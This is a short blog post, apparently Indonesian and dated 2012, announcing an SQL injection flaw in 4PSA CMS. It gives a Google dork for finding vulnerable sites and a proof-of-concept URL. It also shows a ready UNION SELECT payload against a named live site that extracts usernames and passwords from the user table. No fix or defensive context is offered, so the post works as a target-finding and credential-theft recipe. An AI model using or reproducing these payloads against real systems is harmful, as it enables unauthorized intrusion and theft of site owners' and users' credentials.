Minggu, 15 April 2012

4PSA CMS SQL Injection Vulnerabilities

4PSA CMS SQL Injection Vulnerabilities

Google Dork: "Communications solution from 4PSA."
p0c : http://target.com/print.php?id=[SQLi]


Example site :

http://www.pchardware.ro/Reviews/print.php?id=NULL%20UNION+SelEct+group_concat%28uname,0x3a,pwd%29,2+FROM%20user--


Best Regard's
Vicky-Cyber 

0 Coment:

Posting Komentar